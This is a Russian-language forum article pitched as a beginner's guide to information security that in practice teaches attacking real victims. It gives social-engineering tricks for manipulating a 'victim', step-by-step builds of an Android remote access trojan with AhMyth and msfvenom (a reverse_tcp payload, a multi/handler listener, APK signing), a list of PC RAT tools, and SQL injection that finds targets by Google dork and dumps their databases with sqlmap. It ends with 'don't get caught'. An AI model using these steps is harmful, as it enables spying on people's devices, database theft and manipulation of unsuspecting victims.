Приветствую дорогие друзья. Данная статья написана для тех, кто начинает свой путь в информационную безопасность. Будем говорить о основных знаниях и умениях, которые нужно знать каждому. По крайней мере с этого начинал я. И хочется как говорится поделиться опытом и предотвратить развития своих ошибок у других людей. Кого я заинтересовал, приступим.
Введение
А начну пожалуй с того, на сколько актуальна данная тема. На данный момент ни одна система не является безопасной. На каждую из них найдется свой умник, а даже не один, который сможет обойти всю систему безопасности на определенном сервере или сайте. Не важно. На данный момент именно умения разбираться в ИБ очень важно, так как людей на такую должность идет довольно мало. И так, моя же задача научить вас основам и погрузить в этот путь. Дать заряда уверенности и мотивации, чтобы вы продолжили свой путь. Но пожалуй тут будет по мимо этого всего и доля практики, после которой вы сможете спокойно взламывать ПК и сайты со "стандартной" защитой. Переходим к основам.
Теория | Просто и легко
И так, как мы все знаем, прежде чем ломать какой-либо сайт хакер первым делом собирает информацию о нем. Да это не только о сайтах. Даже при заражении чужого пк нужно знать жертву. Для этого есть отдельный термин. Социальная Инженерия. Сокращенно СИ, но давайте рассмотрим, что это такое:
Социальная Инженерия - это прежде всего приемы, методы и технологии в целом, которые создают нужную обстановку вокруг жертвы (условия, обстоятельства) которые приводят хакера к определенному результату. То есть он манипулирует жертвой. Давайте рассмотрим самый простой пример.
Представьте себе очередного человека, который ничем не отличается от других. Он так же развлекается, ходит в кино, музеи и другие места. Типичная жизнь, но на что нам обратить внимания и что даст нужную информацию, которая позволит завоевать доверия человека? Прежде всего нужно смотреть на характер. При встречах уделять внимания движениям. К примеру это может дать знак на невнимательность человека. Давайте я вам расскажу пару секретов, которые помогут при общении с людьми:
"Не спеши улыбаться" - не улыбайтесь при встрече с жертвой. В таком случае начинает казаться, что это адресовано всем окружающим. В таком случае мгновенно всматривайтесь в лицо человека. И только после парочки секунд можете улыбнуться. Это даст понять, что данное действие адресовано именно собеседнику и может дать толчёк на хороший разговор.
"Неутомимый взгляд" - данный прием заключается в том, что при общении ваша задача не отрывать глаза от собеседника, даже если он прекратил разговор. Это дает уверенность в себе и то, что вы полностью доверяете человеку. В случае того, если вам нужно отвести взгляд рекомендуется делать это медленно пытаясь удержать взгляд на человеке.
"Больше информации" - представьте, что вам нужно в ходе разговора по определенной теме узнать от жертвы все по максимум. Как это сделать? Все очень просто. Покажите свое безразличие к собеседнику. При общении с ним, он увидит, то на сколько данная тема не интересна вам и попытается дать как можно больше информации по ней. Работает не со всеми, но попробовать стоит.
"Старый друг" - это очень важная часть, при которой складывается ситуация первого общения с жертвой. Многие начинают волноваться и паниковать. А вы пробовали представить, что это ваш старый друг? Нет, ну тогда скорее тестируйте. В таком случае ваш мозг подсознательно переключит вас на позитивный лад. Да и тело примет нужную позицию для дружеского разговора.
"Концентрация" - у всех наверно во время важного разговора начинают стучать по столу пальцы. Ноги начинают двигаться, как и само тело. Попробуйте это убрать. Не беспокойтесь и не подавайте подобных знаков. Это даст доверие у собеседника к вам. А это важное и то, чего добиваются многие.
И так. Это только небольшая часть и приемы на лицо. Как дополнительный контент, хочу оставить вам свою книгу. Там вы сможете более подробнее изучить данную тему. Скачиваем здесь. Ну а мы идем дальше. Ну а если точнее, то к созданию первого вируса.
Теория | Крысы повсюду!
Вот и плавно мы переходим ко второму разделу моей статьи. Давайте представим, что к вам плывет в голову при слове RAT? В переводе с английского это крыса, но.... не все так просто. Это аббревиатура под которой у нас скрывается не очень хорошее название:
RAT (Remote Access Trojan) - вирус троян для удаленного доступа к чужому устройству. Наиболее опасный вирус шпион для слежки за пользователями. Создается очень легко и просто, чем мы сейчас и займемся.
А для создания мы будем использовать две программы. Создадим на Linux и Windows. Буду писать как можно подробнее, но оставляя только нужную информацию. Приступим к созданию.
Практика | Сливаемся с местностью
Ну что же, перейдем непосредственно к созданию. Начну пожалуй с Windows. Создавать оба класса троянов будем под Android, но я так же оставлю ресурсы для создания таких вирусов под ПК. Идем к самому процессу.
В одной из своих статей я подробно описывал действия данной программы. А именно я говорю про AhMyth RAT. Давайте, чтобы далеко не ходить попробуем создать все через него. А, да, кому интересно где первоначально этот софт я упомянул читаем здесь. Ну а мы переходим к настройке и установки:
1. Для начало посетим Github.
2. Там выбираете свой тип загрузки (Win64 and Win32).
3. После распаковываем нашу программу.
4. В первом окошке VCTIMS LAB кликаем на кнопку >_ Listen.
5. Переходим на соседнее окно и в Source IP вводим наш IP адресант.
6. Узнать IP можно нажав Win + R и введя в окно cmd, а после ipconfig.
7. Теперь соберем нашего шпиона. Кликаем на кнопку Build.
8. Ждем результата и после вытаскиваем вирус из указанного пути.
Вот такая легкая схема создания небольшого RAT'ника для удаленного управления. После того как ваш вирус запустится на устройстве вы увидите открытую сессию, в которой сможете контролировать устройство жертвы. Теперь же перейдем к более легкому пути и создадим этот же вирус но на Linux с дистрибутивом Kali и через софт msfvenom. Приступим.
Практика | Linux твой друг!
Как было сказано ранее мы будем писать тот же троян удаленного действия, но уже на Kali Linux. Сразу скажу, это гораздо проще и менее затратнее по времени. Перейдем к делу.
1. Открываем терминал.
2. Пишем данный код:
msfvenom -p android/meterpreter/reverse_tcp LHOST=здесь ваш IP LPORT=4444 R > FileName.apk3. Теперь у нас создается вирус и в ответ мы получаем это:
No platform was selected, choosing Msf::Module:
latform::Android from the payloadNo Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes
4. Это означает, что все отлично и наш вирус создан, но это только пол дела.
5. Вводим в том же терминале msfconsole.
6. Так же теперь прописываем:
use exploit/multi/handler7. И дальше вводим последовательно данный код:
set LHOST ваш IPset LPORT 44448. Чтобы узнать ip адрес пишите ifconfig.
9. После запуска на устройстве жертвы у вас откроется сессия meterpreter с расширенным функционалом для управления.
Вроде все понятно разъяснил. В дополнении я дам вам парочку функций для каких-либо улучшений готового apk.
Создание хранилища ключей -
keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000Подписание созданного apk -
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore путь к вирусу.apkПроверка вируса -
jarsigner -verify -verbose -certs путь к вирусу.apkИ так, теперь мы от и до разобрались с тем, как создать свой вирус. Но я вам обещал дать другие программы для создания вирусов под ПК. А вот их список:
1. DarkComet Rat
2. Spy-Net
3. ProRAT
4. Back Orifice
5. Cerberus Rat
Вот и список, да он небольшой, но ради ознакомления советую посмотреть данный софт. Ну а мы двигаем дальше.
Теория | Инъекция Сайта
И так, давайте перейдем к сайтам и посмотрим самый как по мне легкий способ взломать сайт.
SQL инъекция - вид атаки при котором на сайт внедряется в запрос произвольный SQL код. Для выявления данной атаки чаще всего в конце URL ставят ' если перед ним указано id=число.
Запомнить легко, но давайте попробуем найти такую уязвимость. Для этого воспользуемся Google Dorks. Открываем гугл и вводим:
inurl:index.php?id=И ищем любой незащищенный сайт. Да, хочу сказать очень важную деталь. Многие наверно замечали, что при выявлении данной уязвимости в конец ссылки часто сайт ставит вместо ' берет %27. Это ничем не отличается. Так как %27 это та же одиночная верхняя запятая. Но давайте на практике попробуем воспользоваться данной уязвимостью и взломать сайт.
Практика | SQL Карта
Работать так и продолжим на Kali Linux. Советую новичкам привыкать к линукс так как на нем в большей степени работают хакеры. Как бы это глупо не прозвучало. Но для проведения аудита на безопасность стоит воспользоваться Linux. Для этого используем софт sqlmap:
1. Открываем терминал.
2. Пишем данный код:
sqlmap -u http://*****/index.php?id=1_s3. Данный сайт я использовал как пример. Можете взять любой другой, но я опишу процесс на нем.
4. Получаем список базы данных:
sqlmap -u http://*****/index.php?id=1_s --dbs 5. После обнаружения БД нам нужно в них перейти командой:
sqlmap -u http://*****/index.php?id=1_s -D выбранная вами база данных --tables6. Теперь перед нами открылась таблица и допустим нам нужно узнать, что в них храниться, а именно колонки. Для этого пишем:
sqlmap -u http://*****/index.php?id=1_s -D выбранная вами база данных -T выбранная вами таблица --columns7. Но, по всей видимости это не то, что мы ищем. Поэтому, чтобы узнать содержимое в этой таблице мы пишем:
sqlmap -u http://*****/index.php?id=1_s -D выбранная вами база данных -T выбранная вами таблица --dumpВот вам и основное использование данной уязвимости. По виду сказать что сложно нельзя, но все же теории без практики никогда не бывает. Это только часть информации, которую я вам предоставил. Продолжения будет, но для этого мне нужно знать ваше мнения. А пока идем к выводам.
Вывод | Итог
Данная статья дает маленькую часть знаний в сфере хакинга. Лично скажу с этого начинал я. Это не сложно, пока не столкнешься с настоящей проблемой. Но их нужно преодолевать. Хочу сказать, что данная информация даст по мимо практики и теории небольшую мотивацию к подробному изучению данной темы. Здесь вы узнали только небольшой фрагмент и он даст вам шаг двигаться дальше. Ну а на этом у меня все. Удачи и не попадитесь
Последнее редактирование модератором:
